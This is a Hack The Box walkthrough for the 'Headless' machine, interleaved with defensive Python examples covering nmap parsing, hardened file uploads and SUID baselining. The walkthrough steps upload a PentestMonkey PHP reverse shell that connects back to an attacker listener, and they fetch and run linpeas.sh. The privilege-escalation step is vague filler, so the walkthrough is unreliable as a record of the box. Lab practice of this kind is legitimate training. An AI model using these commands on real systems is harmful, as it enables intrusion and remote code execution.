Headless
Step 1: Reconnaissance
Start by scanning the machine with Nmap to identify open ports and services.
nmap -sC -sV -oN headless.nmap <machine-ip>
- -sC: Run default scripts.
- -sV: Detect service versions.
- -oN: Output scan results to a file.
Expected Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 (Debian)
From the scan, we learn that the server is running SSH on port 22 and Apache HTTP on port 80.
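As an added example (not part of the original walkthrough), here is a small Python parser for the nmap normal-output (-oN) format shown above. The sample scan text is constructed to mirror that port table; the host address and the script lines in it are placeholders, not a real capture. The last function shows the defender's use of the same data: comparing the open ports against the set the host is supposed to expose.

```python
import re
from typing import Dict, List, NamedTuple, Set

# Constructed sample in nmap's normal (-oN) output format, mirroring the
# port table shown in the walkthrough. The address is a placeholder.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated as: nmap -sC -sV -oN headless.nmap 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:bb:cc (RSA)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
"""


class PortRecord(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# A port-table row: "<port>/<proto> <state> <service> [<version...>]".
# Script output lines start with "|" or "|_" and never match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_normal(text: str) -> List[PortRecord]:
    """Extract the port-table rows from -oN output, skipping headers and script output."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, version.strip()))
    return records


def open_services(text: str) -> Dict[str, str]:
    """Map 'port/proto' -> version banner for open ports only."""
    return {f"{r.port}/{r.proto}": r.version
            for r in parse_nmap_normal(text) if r.state == "open"}


def unexpected_ports(text: str, expected: Set[str]) -> Set[str]:
    """Defender check: open ports that are not in the host's expected baseline."""
    return set(open_services(text)) - set(expected)


if __name__ == "__main__":
    for key, banner in open_services(SAMPLE_NMAP_OUTPUT).items():
        print(key, banner)
    print("not in baseline:", unexpected_ports(SAMPLE_NMAP_OUTPUT, {"22/tcp"}))
```

The regex keys on the `port/proto` prefix, so the `PORT STATE ...` header, the `Not shown:` line and the `|`-prefixed NSE script output are ignored without special-casing each one.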
Step 2: Web Enumeration
Let’s check the web server on port 80 by navigating to http://<machine-ip> in your browser. You should see a basic web page. Next, we’ll use Gobuster to enumerate directories.
gobuster dir -u http://<machine-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
Expected Output:
/.hta (Status: 403) [Size: 294]
/.htaccess (Status: 403) [Size: 294]
/.htpasswd (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 28]
There is a robots.txt file. Let’s inspect it:
curl http://<machine-ip>/robots.txt
Expected Output:
User-agent: *
Disallow: /upload
This file disallows access to the /upload directory, which is worth checking out. Visit http://<machine-ip>/upload in your browser, and you should find an upload form.
Step 3: Exploiting the File Upload
Try uploading a simple PHP reverse shell to the server. You can get one from PentestMonkey.
First, download the reverse shell:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Open the file and modify the IP address and port to match your attacking machine:
nano php-reverse-shell.php
Change:
$ip = 'your-ip'; // IP address of your machine
$port = 4444; // Port on which your listener will run
Now, attempt to upload the PHP shell via the web form. Once uploaded, you can access it through the URL:
http://<machine-ip>/upload/your_shell.php
But before visiting the URL, set up a listener on your machine using Netcat:
nc -lvnp 4444
If the upload is successful, visiting the PHP file should trigger the reverse shell, and you should get a connection.
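The upload works because the server trusts the client-supplied filename and writes the file where the web server will serve and execute it; the robots.txt entry only hides the directory from crawlers and is not an access control. As an added example, not code from the box or from this walkthrough, here is a hypothetical upload handler in Python in both forms: the vulnerable version beside a hardened one that allow-lists extensions, checks the file's magic bytes against the claimed type, generates its own filename and stores the file outside the web root. The demo() function runs both against constructed uploads in a scratch directory, so it runs offline.

```python
import os
import secrets
import tempfile
from pathlib import Path

# Extensions the hardened handler accepts, each with the magic bytes it must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


def save_upload_vulnerable(webroot: Path, filename: str, data: bytes) -> Path:
    """Hypothetical handler with the weakness the walkthrough relies on: it keeps the
    client's filename and writes under the web root, so an uploaded .php file is
    served and executed by the web server."""
    dest = webroot / "upload" / filename  # name, extension and content are unchecked
    dest.parent.mkdir(parents=True, exist_ok=True)
    dest.write_bytes(data)
    return dest


class UploadRejected(ValueError):
    pass


def save_upload_hardened(store_dir: Path, filename: str, data: bytes) -> Path:
    """Hardened handler: size cap, extension allow-list, magic-byte check,
    server-generated name, storage outside the web root, no overwrite."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    # Only the final extension counts; lowercase so 'shell.pHp' is not a bypass.
    ext = Path(filename).suffix.lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data.startswith(magic):
        raise UploadRejected("content does not match the claimed image type")
    # Discard the client name entirely: no traversal, no double extensions, no collisions.
    safe_name = secrets.token_hex(16) + ext
    store_dir.mkdir(parents=True, exist_ok=True)
    dest = store_dir / safe_name
    # O_EXCL so an existing file is never overwritten; 0o600 keeps it non-executable.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest


def upload_is_safe(store_dir: Path, filename: str, data: bytes) -> bool:
    """True if the hardened handler accepts the file."""
    try:
        save_upload_hardened(store_dir, filename, data)
        return True
    except UploadRejected:
        return False


def demo() -> dict:
    """Run both handlers against constructed uploads in a scratch directory."""
    root = Path(tempfile.mkdtemp())
    webroot, store = root / "www", root / "private_uploads"
    # Constructed stand-in for a script upload; it is not a working shell.
    php_payload = b"<?php echo 'constructed placeholder'; ?>"
    png_payload = ALLOWED_TYPES[".png"] + b"\x00" * 32
    return {
        "vuln_accepts_php": save_upload_vulnerable(webroot, "shell.php", php_payload).exists(),
        "hard_rejects_php": not upload_is_safe(store, "shell.php", php_payload),
        "hard_rejects_mixed_case": not upload_is_safe(store, "shell.pHp", php_payload),
        "hard_rejects_double_ext": not upload_is_safe(store, "shell.php.png", php_payload),
        "hard_rejects_no_ext": not upload_is_safe(store, "shell", php_payload),
        "hard_accepts_png": upload_is_safe(store, "photo.png", png_payload),
        "hard_neutralizes_traversal":
            save_upload_hardened(store, "../../x.png", png_payload).parent == store,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'ok' if ok else 'FAIL'}")
```

The double-extension case (`shell.php.png`) is caught by the magic-byte check rather than by name parsing, which is why the content check matters even with a strict allow-list. Serving the stored files back through a separate handler that sets the content type itself completes the design.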
Step 4: Gaining a Shell
Once you have a reverse shell, stabilize it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Step 5: Privilege Escalation
Let’s enumerate the system for privilege escalation possibilities. Start by checking sudo privileges:
sudo -l
If no immediate sudo privileges are available, check for SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Alternatively, you can use LinPEAS to automate the enumeration process. Download and execute it:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
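The find command above is also the basis of a simple integrity check on the defender's side. As an added example, not from this walkthrough, here is a Python walker that reports the same setuid regular files and diffs them against a saved baseline, so a newly planted setuid binary stands out in a scheduled check. demo() builds a constructed directory tree with one expected and one unexpected setuid file, so it runs offline and without root; the paths in it are stand-ins, not real system binaries.

```python
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, Set


def find_suid_files(root: Path) -> Set[Path]:
    """Walk `root` and return regular files with the setuid bit set, which is what
    `find / -perm -u=s -type f` reports. Symlinks are not followed."""
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            try:
                st = os.lstat(p)
            except OSError:
                continue  # unreadable or vanished; skipped like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(p)
    return found


def diff_against_baseline(current: Set[Path], baseline: Set[str]) -> Dict[str, Set[str]]:
    """Defender view: setuid files that appeared since the baseline was recorded,
    and expected ones that have gone missing."""
    cur = {str(p) for p in current}
    return {"new": cur - baseline, "missing": baseline - cur}


def demo() -> dict:
    """Constructed tree: one legitimate setuid file, one unexpected one, one plain file."""
    root = Path(tempfile.mkdtemp())
    (root / "usr" / "bin").mkdir(parents=True)
    (root / "tmp").mkdir()
    expected = root / "usr" / "bin" / "passwd"   # stand-in for a baseline setuid binary
    rogue = root / "tmp" / "backup_helper"       # stand-in for one that should not exist
    plain = root / "usr" / "bin" / "ls"          # ordinary executable, not setuid
    for f in (expected, rogue, plain):
        f.write_bytes(b"#!/bin/sh\nexit 0\n")
    os.chmod(expected, 0o4755)
    os.chmod(rogue, 0o4755)
    os.chmod(plain, 0o755)
    baseline = {str(expected)}
    report = diff_against_baseline(find_suid_files(root), baseline)
    return {
        "new": sorted(report["new"]),
        "missing": sorted(report["missing"]),
        "rogue": str(rogue),
        "expected": str(expected),
    }


if __name__ == "__main__":
    r = demo()
    print("new setuid files:", r["new"])
    print("missing from baseline:", r["missing"])
```

In practice the baseline is recorded from a known-good image and stored off-host, and the check is run on a schedule; a non-empty "new" set is the signal worth alerting on.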
Step 6: Exploiting a Vulnerability
During enumeration, you may find an exploitable weakness, such as a misconfigured service, outdated software, or a SUID binary that can be abused for privilege escalation. Follow through with the method that matches what you found.
Step 7: Capture the Flags
Once you escalate privileges to root, navigate to the home directories to find the flags.
For the user flag:
cat /home/<username>/user.txt
For the root flag:
cat /root/root.txt
Conclusion
With that, you’ve completed the Headless box on Hack The Box. Remember, the specific vulnerability exploited might vary based on enumeration results, so always adapt based on what you find during enumeration.